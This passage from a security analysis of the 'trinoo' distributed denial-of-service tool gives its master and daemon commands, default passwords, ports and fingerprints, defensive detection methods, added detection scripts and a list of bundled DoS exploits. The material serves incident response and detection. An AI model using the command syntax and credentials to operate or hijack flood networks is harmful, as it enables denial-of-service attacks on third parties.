          Trying 10.0.0.1
          Connected to 10.0.0.1
          Escape character is '^]'.
          kwijibo
          Connection closed by foreign host.
           . . .
      
          attacker$ telnet 10.0.0.1 27665
          Trying 10.0.0.1
          Connected to 10.0.0.1
          Escape character is '^]'.
          betaalmostdone
          trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
      
      
          trinoo>
      
      Certain commands sent to the trinoo daemons by the master are also
      password protected.  This password is sent in clear text between the
      master and daemons.
      
      The default passwords were:
      
          "l44adsl"           trinoo daemon password
          "gOrave"            trinoo master server startup ("?? " prompt)
          "betaalmostdone"    trinoo master remote interface password
          "killme"            trinoo master password to control "mdie" command
      
      
      Master commands
      ---------------
      
      The trinoo master supports the following commands:
       
        die           Shut down the master.
      
        quit          Log off the master.
      
        mtimer N      Set DoS timer to N seconds.  N can be between 1 and 1999
                      seconds. If N is < 1, it defaults to 300. If N
                      is > 2000, it defaults to 500.
      
        dos IP        DoS the IP address specified.  A command ("aaa l44adsl
                      IP") is sent to each Bcast host (i.e., trinoo daemons)
                      telling them to DoS the specified IP address.
      
        mdie pass     Disable all Bcast hosts, if the correct password is
                      specified. A command is sent ("d1e l44adsl") to each
                      Bcast host telling them to shut down.  A separate
                      password is required for this command.
      
        mping         Send a PING command ("png l44adsl") to every active
                      Bcast host.
      
        mdos <ip1:ip2:ip3>
                      Multiple DoS.  Sends a multiple DoS command
                      ("xyz l44adsl 123:ip1:ip2:ip3") to each Bcast host.
      
        info          Print version and compile information, e.g.:
        
           This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c
           Compiled 15:08:41 Aug 16 1999
      
        msize         Set the buffer size for packets sent during DoS attacks.
      
        nslookup host Do a name service lookup of the specified host from
                      the perspective of the host on which the master
                      server is running.
      
        killdead      Attempts to weed out all dead Bcast hosts by first
                      sending all known Bcast hosts a command ("shi l44adsl")
                      that causes any active daemons to reply with the initial
                      "*HELLO*" string, then renames the Bcast file (with
                      extension "-b") so it will be re-initialized when the
                      "*HELLO*" packets are received.
      
        usebackup     Switch to the backup Bcast file created by the
                      "killdead" command.
      
        bcast         List all active Bcast hosts.
      
        help [cmd]    Give a (partial) list of commands, or a brief
                      description of the command "cmd" if specified.
      
        mstop         Attempts to stop a DoS attack (not implemented, but
                      listed in the help command).
      
      
      Daemon commands
      ---------------
      
      The trinoo daemon supports the following commands:
      
        aaa pass IP   DoS the specified IP address.  Sends UDP packets to random
                      (0-65534) UDP ports on the specified IP addresses for
                      a period of time (default is 120 seconds, or 1 - 1999
                      seconds as set by the "bbb" command.)  The size of the
                      packets is that set by the "rsz" command, or the default
                      size of 1000 bytes.
      
        bbb pass N    Sets time limit (in seconds) for DoS attacks.
      
        shi pass      Sends the string "*HELLO*" to the list of master servers
                      compiled into the program on port 31335/udp.
      
        png pass      Sends the string "PONG" to the master that issued the
                      command on port 31335/udp.
      
        d1e pass      Shut down the trinoo daemon.
      
        rsz N         Set size of buffer for DoS attacks to N bytes.
                      (The trinoo daemon simply malloc()s a buffer with this
                      size, then sends the uninitialized contents of the
                      buffer during an attack.)
      
        xyz pass 123:ip1:ip2:ip3
                      Multiple DoS.  Does the same thing as the "aaa"
                      command, but for multiple IP addresses.
      
      It could be coincidence, but I will give the author some credit and
      assume that three letter commands were chosen so they don't show up in
      the binary as visible strings under the default behavior of
      STRINGS(1).  You must use the "--bytes=3" option of GNU STRINGS(1) to
      see the commands:
      
              # strings --bytes=3 ns | tail -15
              socket
              bind
              recvfrom
              l44
              %s %s %s
              aIf3YWfOhw.V.
              aaa
              bbb
              shi
              png
              PONG
              d1e
              rsz
              xyz
              *HELLO*
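
      Why the default run of STRINGS(1) misses the command words, shown as an
      added example (not part of the original paper): a small printable-run
      extractor applied with a minimum length of 4 (the default) and of 3.
      The byte blob is constructed from the strings listed above and only
      stands in for the daemon binary; the function names are this example's.

```python
import re

# Strings the paper lists for the daemon binary ("ns"), in the order shown.
DAEMON_MARKERS = ["l44", "aaa", "bbb", "shi", "png", "PONG",
                  "d1e", "rsz", "xyz", "*HELLO*"]

# Constructed stand-in for the tail of the daemon's string table:
# NUL-terminated C strings surrounded by a few non-printable bytes.
CONSTRUCTED_DAEMON_TAIL = (
    b"\x00\x01\x02"
    + b"\x00".join([
        b"socket", b"bind", b"recvfrom", b"l44", b"%s %s %s",
        b"aIf3YWfOhw.V.", b"aaa", b"bbb", b"shi", b"png", b"PONG",
        b"d1e", b"rsz", b"xyz", b"*HELLO*",
    ])
    + b"\x00\x7f"
)


def printable_runs(data, min_len=4):
    """Return runs of printable ASCII (and tab) of at least min_len bytes,
    which is the selection rule strings(1) applies."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def marker_hits(data, min_len):
    """Markers that appear as a whole run, so 'aaa' inside a longer word
    does not count."""
    runs = set(printable_runs(data, min_len))
    return [m for m in DAEMON_MARKERS if m in runs]


def compare(data):
    """Show what each minimum length reveals and what the default hides."""
    default = marker_hits(data, 4)
    short = marker_hits(data, 3)
    return {
        "default": default,
        "bytes3": short,
        "hidden_by_default": [m for m in short if m not in default],
    }


if __name__ == "__main__":
    for key, value in compare(CONSTRUCTED_DAEMON_TAIL).items():
        print(key, value)
```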
      
      
      Fingerprints
      ------------
      
      The method used to install the trinoo daemon on some systems employs
      a crontab entry to start the daemon every minute.  Examining crontab
      files would locate this entry:
      
          * * * * * /usr/sbin/rpc.listen
      
      The master program creates a file (default name "...") containing the
      set of Bcast hosts.  If the command "killdead" is used, an "shi" command
      is sent to all daemons listed in "...", which causes them to send the
      initial "*HELLO*" string to all masters. The current list is renamed
      (default "...-b") and a new list is then generated as each remaining
      live daemon sends its "*HELLO*".
      
      The source code ("master.c") contains the following lines:
      
      ------------------------------------------------------------------------------
      . . .
      /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?)
         comment out for no encryption... */
      #define CRYPTKEY "ZsoTN.cq4X31"
      . . .
      ------------------------------------------------------------------------------
      
      If the program was compiled with CRYPTKEY defined, the IP addresses of
      Bcast hosts are encrypted using the Blowfish encryption algorithm:
      
          # ls -l ... ...-b
          -rw-------   1 root     root           25 Sep 26 14:46 ...
          -rw-------   1 root     root           50 Sep 26 14:30 ...-b
          # cat ...
          JPbUc05Swk/0gMvui18BrFH/
          # cat ...-b
          aE5sK0PIFws0Y0EhH02fLVK.
          JPbUc05Swk/0gMvui18BrFH/
      
      Assuming there is no "root kit" present to hide processes, the master
      server shows the following network socket fingerprints (of course, the
      names and directory locations of either program are subject to change):
      
      ------------------------------------------------------------------------------
      # netstat -a --inet
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address           Foreign Address         State      
      tcp        0      0 *:27665                 *:*                     LISTEN      
      . . .
      udp        0      0 *:31335                 *:*                                 
      . . .
      
      # lsof | egrep ":31335|:27665"
      master   1292     root    3u  inet       2460              UDP *:31335 
      master   1292     root    4u  inet       2461              TCP *:27665 (LISTEN)
      
      # lsof -p 1292
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      master  1292 root  cwd    DIR    3,1    1024 14356 /tmp/...
      master  1292 root  rtd    DIR    3,1    1024     2 /
      master  1292 root  txt    REG    3,1   30492 14357 /tmp/.../master
      master  1292 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
      master  1292 root  mem    REG    3,1   63878 29116 /lib/libcrypt-2.1.1.so
      master  1292 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
      master  1292 root    0u   CHR    4,1          2967 /dev/tty1
      master  1292 root    1u   CHR    4,1          2967 /dev/tty1
      master  1292 root    2u   CHR    4,1          2967 /dev/tty1
      master  1292 root    3u  inet   2534           UDP *:31335 
      master  1292 root    4u  inet   2535           TCP *:27665 (LISTEN)
      ------------------------------------------------------------------------------
      
      A system running a daemon would show the following:
      
      ------------------------------------------------------------------------------
      # netstat -a --inet
      Active Internet connections (servers and established)
      Proto Recv-Q Send-Q Local Address           Foreign Address         State      
      . . .
      udp        0      0 *:1024                  *:*                                 
      udp        0      0 *:27444                 *:*                                 
      . . .
      
      # lsof | egrep ":27444"
      ns       1316     root    3u  inet       2502              UDP *:27444 
      
      # lsof -p 1316
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
      ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
      ns      1316 root  rtd    DIR    3,1    1024      2 /
      ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
      ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
      ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
      ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
      ns      1316 root    0u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    1u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    2u   CHR    4,1           2967 /dev/tty1
      ns      1316 root    3u  inet   2502            UDP *:27444 
      ns      1316 root    4u  inet   2503            UDP *:1024 
      ------------------------------------------------------------------------------
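
      The socket and crontab fingerprints above lend themselves to a scripted
      host check. The following is an added example (not part of the original
      paper): it reads saved "netstat" output and a crontab listing and
      reports which default trinoo indicators are present. The netstat
      samples are abridged from the listings above, the crontab sample is
      constructed, and all function names are this example's own.

```python
# Default sockets from the "Communication ports" table.
TRINOO_DEFAULT_SOCKETS = {
    ("tcp", 27665): "master",   # attacker control port
    ("udp", 31335): "master",   # receives *HELLO* / PONG from daemons
    ("udp", 27444): "daemon",   # receives commands from the master
}
KNOWN_DAEMON_PATH = "/usr/sbin/rpc.listen"   # install path seen in trin.sh

NETSTAT_MASTER = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
 . . .
udp        0      0 *:31335                 *:*
"""
NETSTAT_DAEMON = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
"""
# Constructed crontab: one ordinary job plus the entry from the paper.
CRONTAB_SAMPLE = """\
# constructed sample
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /usr/sbin/rpc.listen
"""


def socket_findings(netstat_text):
    """Return (role, 'port/proto') for each default trinoo socket found.

    Expects numeric ports; run netstat with -n if services are named.
    """
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue
        port = fields[3].rsplit(":", 1)[-1]
        if not port.isdigit():
            continue
        if fields[0] == "tcp" and fields[-1] != "LISTEN":
            continue
        role = TRINOO_DEFAULT_SOCKETS.get((fields[0], int(port)))
        if role:
            found.append((role, "%s/%s" % (port, fields[0])))
    return found


def cron_findings(crontab_text):
    """Return (level, command) for every job scheduled '* * * * *'.

    Binary names change between intrusions, so any every-minute job is
    reported for review; the path from the paper is marked separately.
    """
    found = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        if fields[:5] == ["*"] * 5:
            program = fields[5].split()[0]
            level = "known-path" if program == KNOWN_DAEMON_PATH else "review"
            found.append((level, fields[5]))
    return found


def host_report(netstat_text, crontab_text):
    """Combine both checks into one summary for the host."""
    sockets = socket_findings(netstat_text)
    return {
        "roles": sorted({role for role, _ in sockets}),
        "sockets": [sock for _, sock in sockets],
        "cron": cron_findings(crontab_text),
    }


if __name__ == "__main__":
    print(host_report(NETSTAT_MASTER, ""))
    print(host_report(NETSTAT_DAEMON, CRONTAB_SAMPLE))
```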
      
      
      Defenses
      --------
      
      Of course, the best defense is to prevent intrusions and root level
      compromise of your systems in the first place, so there would be no
      systems on which to install trinoo master/daemons.  In an ideal world,
      all systems would be patched, secured, monitored, intrusion detection
      systems and firewalls would be available to detect and reject packets,
      and I'd be a multi-millionaire living six months of the year in a beach
      mansion on Bali, and six months in the French Alps.  In the real world,
      this is not an option (at least not in the foreseeable future.)
      
      Instead, your network may already have several trinoo daemons running
      and ready to DoS other systems at any minute.  So how can they be
      detected or disabled?
      
      Because the programs use high numbered UDP ports for both communication
      and attack, it will be very difficult (if not impossible) to block it
      without breaking programs that use UDP on high numbered ports.
      
      The easiest method to detect the presence of trinoo masters or daemons
      (as the code exists presently) may be to monitor all UDP packets on
      shared Ethernet segments and look for the tell tale signs of
      communication between master(s) and daemon(s) as described elsewhere in
      this paper. (Switches would preclude seeing UDP packets that are not
      associated with the MAC address of the monitoring host's network
      interface.)  Unfortunately, this would only occur during an attack,
      which would likely become known by network throughput degradation and/or
      reports of denial of service attacks from victim sites.
      
      If a system is suspected of hosting a trinoo daemon that is actively
      attacking, the output of the Solaris "truss" program on the running
      daemon will show output like the following:
      
      ------------------------------------------------------------------------------
       . . .
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...)
      getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C)   = 0
      time()                                          = 938385467
      open("/dev/udp", O_RDWR)                        = 5
      ioctl(5, I_PUSH, "sockmod")                     = 0
      ioctl(5, I_STR, 0xEFFFF748)                     = 0
      ioctl(5, I_SETCLTIME, 0xEFFFF7FC)               = 0
      ioctl(5, I_SWROPT, 0x00000002)                  = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0
      ioctl(5, I_STR, 0xEFFFF660)                     = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0
      sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0)  = 0
      ioctl(5, I_STR, 0xEFFFF548)                     = 0
      sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
      putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0)            = 0
      time()                                          = 938385467
       . . .
      ------------------------------------------------------------------------------
      
      The traffic on the network during an attack against a single target
      (as seen by "tcpdump") would look like:
      
      ------------------------------------------------------------------------------
      # tcpdump ip host 192.168.0.1
       . . .
      15:40:08.491782 10.0.0.1.1024 > 192.168.0.1.27444: udp 25
      15:40:08.574453 192.168.0.1.32885 > 216.160.XX.YY.16838: udp 4 (DF)
      15:40:08.576427 192.168.0.1.32885 > 216.160.XX.YY.5758: udp 4 (DF)
      15:40:08.579752 192.168.0.1.32885 > 216.160.XX.YY.10113: udp 4 (DF)
      15:40:08.583056 192.168.0.1.32885 > 216.160.XX.YY.17515: udp 4 (DF)
      15:40:08.600948 192.168.0.1.32885 > 216.160.XX.YY.31051: udp 4 (DF)
      15:40:08.604943 192.168.0.1.32885 > 216.160.XX.YY.5627: udp 4 (DF)
      15:40:08.610886 192.168.0.1.32885 > 216.160.XX.YY.23010: udp 4 (DF)
      15:40:08.614202 192.168.0.1.32885 > 216.160.XX.YY.7419: udp 4 (DF)
      15:40:08.615507 192.168.0.1.32885 > 216.160.XX.YY.16212: udp 4 (DF)
      15:40:08.616854 192.168.0.1.32885 > 216.160.XX.YY.4086: udp 4 (DF)
      15:40:08.618827 192.168.0.1.32885 > 216.160.XX.YY.2749: udp 4 (DF)
      15:40:08.623480 192.168.0.1.32885 > 216.160.XX.YY.12767: udp 4 (DF)
      15:40:08.625458 192.168.0.1.32885 > 216.160.XX.YY.9084: udp 4 (DF)
      15:40:08.628764 192.168.0.1.32885 > 216.160.XX.YY.12060: udp 4 (DF)
      15:40:08.632090 192.168.0.1.32885 > 216.160.XX.YY.32225: udp 4 (DF)
       . . .
      ------------------------------------------------------------------------------
      
      
      Weaknesses
      ----------
      
      The first weakness is that the crypt() encrypted passwords, and some
      prompts and return strings, are visible in both the master and daemon
      binary images.
      
      This can allow you to identify whether you have found a master or a
      daemon, determine whether the passwords are the defaults shown in this
      paper or not, and potentially allow you to exploit the password
      weaknesses to take control of some/all of the trinoo network yourself.
      
      If the source code has been modified (which it no doubt will be by smarter
      attackers), you would need to crack the passwords, or use a
      hexadecimal/ASCII editor (e.g., "xxd", part of the VIM editor suite) and
      change them in the binary image, in order to, for example, run the
      master to retrieve the list of daemons.
      
      If the source has not been modified, you can determine this fact by observing the
      strings embedded in the program binary:
      
      ------------------------------------------------------------------------------
      # strings - ns
       . . .
      socket
      bind
      recvfrom
      %s %s %s
      aIf3YWfOhw.V.           <=== crypt() encrypted password "l44adsl"
      PONG
      *HELLO*
       . . .
      
      # strings - master
       . . .
      ---v
      v1.07d2+f3+c
      trinoo %s
      l44adsl                 <=== clear text version of daemon password
      sock
      0nm1VNMXqRMyM           <=== crypt() encrypted password "gOrave"
      10:09:24
      Sep 26 1999
      trinoo %s [%s:%s]
      bind
      read
      *HELLO*
      ZsoTN.cq4X31            <=== CRYPTKEY
      bored
      NEW Bcast - %s
      PONG
      PONG %d Received from %s
      Warning: Connection from %s
      beUBZbLtK7kkY           <=== crypt() encrypted password "betaalmostdone"
      trinoo %s..[rpm8d/cb4Sx/]
       . . .
      DoS: usage: dos <ip>
      DoS: Packeting %s.
      aaa %s %s
      mdie
      ErDVt6azHrePE           <=== crypt() encrypted password for "mdie" command
      mdie: Disabling Bcasts.
      d1e %s
      mdie: password?
       . . .
      ------------------------------------------------------------------------------
      
      Next, and more vulnerable, is the daemon password, which travels the
      network in clear text form.  Assuming you know the UDP port on which the
      master communicates to the client, you can capture the password using
      "sniffit", "ngrep", "tcpdump", or any network monitoring program capable
      of showing UDP packet data payloads (see Appendix A for a sample
      session logged with "ngrep").
      
      For example, here is the "png" command being sent to the trinoo daemon
      as seen by "sniffit":
      
      UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444
       45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 .
       C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20  
       6C l 34 4 34 4 61 a 64 d 73 s 6C l
      
      As was mentioned earlier, the "mdie" command in the trinoo master is
      password protected in the master itself.  There are a couple ways
      to attack this.
      
      If you can determine the crypt() encrypted string using the Unix
      "strings" command, you could (potentially) use a password cracking
      utility, such as "crack",  and break it (see Appendix C).  This may
      take a LONG time if the password was well chosen, but it is feasible
      (and the "killme" password for the "mdie" command was cracked in less
      than 30 seconds on a Pentium II).
      
      You could try to sniff the password on the wire between the attacker
      and the master, but presumably this command would not be used by the
      attackers often, if at all, since they want the daemons to be active
      when needed for an attack.
      
      You may have more luck sniffing the daemon password, since it is
      required for most commands.  This can be done on either the daemon's or
      master's network (these are usually entirely different networks.) It
      should be easier to accomplish on the daemon's network since there are
      far more daemons than masters.  Since many of the masters have been
      found on primary name servers, presumably there would be more traffic
      on high-numbered UDP ports on networks containing masters than on
      networks containing daemons (outside of the duration of denial of
      service attacks, that is.) Furthermore you will likely find several
      daemons at a given site, possibly as a result of detecting the
      original system compromise.
      
      Once you have located a daemon, you have also found the list of IP
      addresses of masters (use "strings" to see them.)  You should
      immediately contact these sites and convince them to closely inspect the
      system for signs of intrusion, with likely "root kit" installations to
      make this task more difficult, and attempt to coordinate a response.
      
      Having found a master, the list of daemons (which will likely include
      hosts at many other sites) can be obtained by simply identifying the
      file which contains the list, if unencrypted.  If, however, the file is
      encrypted, you would either have to decrypt the Blowfish encrypted file
      using the same key compiled into the program, or take control of
      the master and use the "bcast" command.
      
      If you have identified an active command session to a master, which is
      a standard "telnet" style TCP session, you could hijack the session
      using "hunt" and start executing commands.  Not knowing the "mdie"
      command password, you could not disable all the daemons directly, but
      you COULD use the "bcast" command and get a list of all of them (you
      would probably want to do this using the "script" command to generate
      a transcript of the session, as this could be a very large list).
      
      Once you know the addresses of all the daemons, and the daemon
      password (visible in "strings" output), you could then send the proper
      command string in UDP packets to any suspected trinoo daemon(s).
      Creation and transmission of UDP packets can be accomplished with
      tools like LibNet, Spak, the Perl Net::RawIP library, etc.  (A Perl
      script using Net::RawIP named "trinot" has been developed to
      accomplish this task.  See Appendix B).
      
      As the typical installation of the daemon includes a crontab entry
      that runs it every minute, you would have to constantly spray your
      entire network to keep the daemons from re-starting.  (This may be due
      to programming bugs that cause the daemons to crash occasionally, or
      may be to defeat system administrators who simply notice and kill the
      process, but do not think to check for a crontab entry that re-starts
      the daemon.)
      
      The daemons can also be found on your network by sniffing the data
      portion of UDP packets for the strings "*HELLO*" and "PONG", or any of
      the command strings themselves for that matter (until the source is
      modified to change these strings, of course.) The "ngrep" program
      works nicely for this:
      
      ------------------------------------------------------------------------------
      # ngrep -i -x "*hello*|pong" udp
      interface: eth0 (192.168.0.200/255.255.255.0)
      filter: ip and ( udp )
      match: *hello*|pong
       . . .
      #
      U 192.168.0.1:32887 -> 10.0.0.1:31335
        2a 48 45 4c 4c 4f 2a                                  *HELLO*         
      ###
      U 192.168.0.1:32888 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      U 192.168.0.3:32815 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
      U 192.168.0.5:32798 -> 10.0.0.1:31335
        50 4f 4e 47                                           PONG            
       . . .
      ------------------------------------------------------------------------------
      
      While not weaknesses in trinoo itself, there are also weaknesses in
      the way the trinoo networks are set up.
      
      As mentioned earlier, some systems showed crontab entries used to
      start the daemons once per minute.  This leaves an obvious fingerprint
      on crontab files.
      
      The scripts observed to automate the installation of trinoo networks
      use the Berkeley "rcp" command (use of rcp has also been observed in a
      file upload capability built into newer versions of the "Tribe Flood
      Network" daemon program).  Monitoring "rcp" connections (514/tcp) from
      multiple systems on your network, in quick succession, to a single IP
      address outside your network would be a good trigger. (Note that the
      use of "rcp" in a script requires an anonymous trust relationship,
      usually in the form of "+ +" in a user's ~/.rhosts file, which also
      will allow you to immediately archive the contents of this account
      while contacting the owners to preserve evidence.)
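
      The rcp trigger described above can be expressed as a sliding-window
      check over flow records.  The following is an added example, not part
      of the original analysis; the internal netblock, the 120 second window,
      the three-source threshold and the flow tuples are all constructed
      assumptions.

```python
from collections import defaultdict, deque
from ipaddress import ip_address, ip_network

INTERNAL = ip_network("192.168.0.0/16")  # assumed local address space
RCP_PORT = 514                           # 514/tcp, as named in the text
WINDOW = 120                             # seconds (assumed tuning value)
THRESHOLD = 3                            # distinct internal sources (assumed)

# Constructed flow records: (epoch_seconds, src, dst, dst_port, proto),
# sorted by time, as a flow collector would export them.
SAMPLE_FLOWS = [
    (1000, "192.168.0.3", "203.0.113.5", 514, "tcp"),
    (1010, "192.168.0.9", "198.51.100.9", 514, "tcp"),   # one host, repeated
    (1030, "192.168.0.5", "203.0.113.5", 514, "tcp"),
    (1040, "192.168.0.9", "198.51.100.9", 514, "tcp"),
    (1050, "192.168.0.4", "192.168.0.20", 514, "tcp"),   # internal only
    (1060, "192.168.0.8", "203.0.113.5", 514, "tcp"),    # third source
    (1070, "192.168.0.3", "203.0.113.5", 80, "tcp"),     # not rcp
    (2000, "192.168.0.3", "203.0.113.77", 514, "tcp"),   # spread out over
    (2600, "192.168.0.5", "203.0.113.77", 514, "tcp"),   # twenty minutes
    (3200, "192.168.0.8", "203.0.113.77", 514, "tcp"),
]


def rcp_fanin_alerts(flows, window=WINDOW, threshold=THRESHOLD):
    """Flag external hosts contacted on 514/tcp by several internal systems
    in quick succession.  Returns [(alert_time, external_dst, sources)]."""
    recent = defaultdict(deque)   # external dst -> deque of (time, src)
    alerted = set()               # report each external host only once
    alerts = []
    for ts, src, dst, dport, proto in flows:
        if proto != "tcp" or dport != RCP_PORT:
            continue
        # Only internal -> external connections are of interest.
        if ip_address(src) not in INTERNAL or ip_address(dst) in INTERNAL:
            continue
        seen = recent[dst]
        seen.append((ts, src))
        # Drop connections that have aged out of the window.
        while seen and ts - seen[0][0] > window:
            seen.popleft()
        sources = {s for _, s in seen}
        if len(sources) >= threshold and dst not in alerted:
            alerted.add(dst)
            alerts.append((ts, dst, sorted(sources)))
    return alerts


if __name__ == "__main__":
    for when, dst, sources in rcp_fanin_alerts(SAMPLE_FLOWS):
        print(f"t={when}: {len(sources)} internal hosts used rcp to {dst}: "
              + ", ".join(sources))
```

      Each internal source named in an alert is a candidate for the ~/.rhosts
      and crontab checks described in this section.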
      
      (Further analysis of trinoo by George Weaver of Pennsylvania State
      University and David Brumley of Stanford University is included in
      Appendix E - Further methods of detecting trinoo.  George deserves
      special credit for attempting to hand-decompile a recovered SPARC
      binary image! ;)
      
      
      The next logical evolutionary steps
      -----------------------------------
      
      One of the easiest attacks to implement is the denial of service
      attack.  Many bugs exist in TCP/IP stacks, for example, that allow
      fragmented packets, large packets, IP options, half-open TCP
      connections, or floods of packets (highest bandwidth wins) etc., to
      cause the system performance to be degraded, or actually crash the
      system.
      
      As each bug is found, an exploit program demonstrating the bug is
      generally produced.  Each of these exploit programs is generally
      unique, exploiting a specific bug that may only affect a single TCP/IP
      implementation (although with Microsoft having such a large market
      share of personal computers, and many home users being almost totally
      unaware of such bugs, let alone where to get and how to apply patches
      to fix these bugs, the chances are high that a multi-exploit attack
      will succeed in crashing the target system.)
      
      These denial of service exploits are available from numerous sites
      on the Internet, such as:
      
              http://www.technotronic.com/denial.html
              http://www.rootshell.com/
      
      The next step was to combine multiple denial of service exploits
      into one tool, using Unix shell scripts.  One such tool, named "rape",
      (according to the code it was written in 1998 by "mars", with
      modifications by "TheVirus" and further code improvements by "ttol")
      integrates the following exploits into a single shell script:
      
        echo "Editted for use with www.ttol.base.org"
        echo "rapeing $IP. using weapons:"
        echo  "latierra          "
        echo -n "teardrop v2        "
        echo -n "newtear           "
        echo -n "boink             "
        echo -n "bonk              "
        echo -n "frag              "
        echo -n "fucked            "
        echo -n "troll icmp        "
        echo -n "troll udp         "
        echo -n "nestea2            "
        echo -n "fusion2           "
        echo -n "peace keeper      "
        echo -n "arnudp            "
        echo -n "nos               "
        echo -n "nuclear           "
        echo -n "ssping            "
        echo -n "pingodeth         "
        echo -n "smurf             "
        echo -n "smurf4            "
        echo -n "land              "
        echo -n "jolt              "
        echo -n "pepsi             "
      
      A tool like this has the advantage of allowing an attacker to give a
      single IP address and have multiple attacks be launched (increasing
      the probability of successful attack), but meant having to have
      pre-compiled versions of each individual exploit packaged up in a Unix
      "tar" format archive, etc., for convenient transfer to a (usually
      stolen) account from which to launch the attack.
      
      To still allow multiple denial of service exploits to be used, but with
      a single pre-compiled program that is easier to store, transfer,
      and use quickly, programs like "targa.c" by Mixter were developed.
      Targa combines all of the following exploits in a single C source
      program:
      
      /* targa.c - copyright by Mixter <mixter@gmx.net>
         version 1.0 - released 6/24/98 - interface to 8
         multi-platform remote denial of service exploits
       */                                                                             
       . . .
      
      /* bonk by route|daemon9 & klepto
       * jolt by Jeff W. Roberson (modified by Mixter for overdrop effect)
       * land by m3lt
       * nestea by humble & ttol
       * newtear by route|daemon9
       * syndrop by PineKoan
       * teardrop by route|daemon9
       * winnuke by _eci */                                                           
      
      Even combined denial of service tools like "targa" still only allow
      one attacker to hit one IP address at a time.
      
      To increase the effectiveness of the attack, groups of attackers,
      using IRC channels or telephone "voice bridges" for communication,
      could coordinate attacks, each person hitting a different system.
      This same coordination is being seen in probing for vulnerabilities,
      and in system compromise and control using multiple back doors
      and "root kits."
      
      Even this has its limits, so in less than two years, it appears the
      next logical step has been taken to combine the power of a number of
      compromised systems into a distributed "denial of service cluster."
      The "trinoo" tool is an example of this, as is another similar tool
      available in the computer underground called the "Tribe Flood Network"
      (or "TFN") by Mixter.
      
      While trinoo only implements UDP flood attacks, TFN supports ICMP
      flood, UDP flood, SYN flood, and Smurf style attacks, and is
      controlled via commands sent as ICMP_ECHOREPLY (ICMP Type 0) packets.
      It also employs Blowfish encryption, similar to trinoo.  (TFN is
      analyzed in a separate paper).
      
      It is all but guaranteed that these tools will continue to follow this
      trend and evolve into truly robust, covert, and distributed denial of
      service attack tools that employ strong encryption of embedded
      strings, passwords to control execution (possibly with trip wires
      that self-destruct, or wipe the entire system disc, if run in the
      wrong way, or by the wrong person), using encrypted communication
      channels, and communicating using packets posing as protocols like
      ICMP that are difficult to detect or block by firewalls.
      
      --
      David Dittrich <dittrich@cac.washington.edu>
      http://staff.washington.edu/dittrich/                                           
      
      
      
      Appendix A: Example of network session captured with "ngrep"
      ------------------------------------------------------------
      
      The following is an example of what an attack session would look
      like when viewed with "ngrep".
      
      ------------------------------------------------------------------------------
      # ngrep -x ".*" tcp port 27665 or udp port 31335 or udp port 27444
      interface: eth0 (192.168.0.200/255.255.255.0)
      filter: ip and ( tcp port 27665 or udp port 31335 or udp port 27444 )
      match: .*
      #
      U 192.168.0.1:32892 -> 10.0.0.1:31335
        2a 48 45 4c 4c 4f 2a                                  *HELLO*         
      #
      T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
        ff f4 ff fd 06                                        .....           
      ######
